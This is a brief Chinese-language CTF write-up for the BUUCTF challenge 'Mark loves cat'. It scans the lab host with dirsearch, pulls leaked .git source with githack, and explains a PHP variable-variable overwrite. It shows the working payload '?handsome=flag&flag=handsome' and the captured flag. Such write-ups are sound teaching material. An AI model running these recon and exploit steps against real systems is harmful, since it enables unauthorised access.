#buuctf [BJDCTF2020]Mark loves cat 1
1、扫描目录,发现git源码泄露:
python dirsearch.py -u http://56031302-b451-41d8-9519-cf380f17cbcb.node5.buuoj.cn:81/
2、下载源码,用githack
python githack.py http://56031302-b451-41d8-9519-cf380f17cbcb.node5.buuoj.cn:81/.git
3.下载看到index.php 的源码,还有flag.php的源码
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
$$x = $y;
}
foreach($_GET as $x => $y){
$$x = $$y;
}
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){
exit($handsome);
}
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($is);
}
echo "the flag is: ".$flag;
flag在flag变量中;根据源码,我们只需要exit($flag)即可以得到flag
1、我们只需要让$handsome=$flag
2、$yds=$flag
3、$is=$flag
构造pyload:
?handsome=flag&flag=handsome
传入handsome=flag则:
$x=handsome $y=flag
$$x=$handsome $$y=$flag
$handsome=$flag
因为$_GET['flag'] === $x && $x !== 'flag'
所以让flag=handsome
就执行exit($handsome)
剩下两个就不举例了
http://56031302-b451-41d8-9519-cf380f17cbcb.node5.buuoj.cn:81/?handsome=flag&flag=handsome
#flag{78246fc9-23ca-422f-b2ea-f7677c6c6370}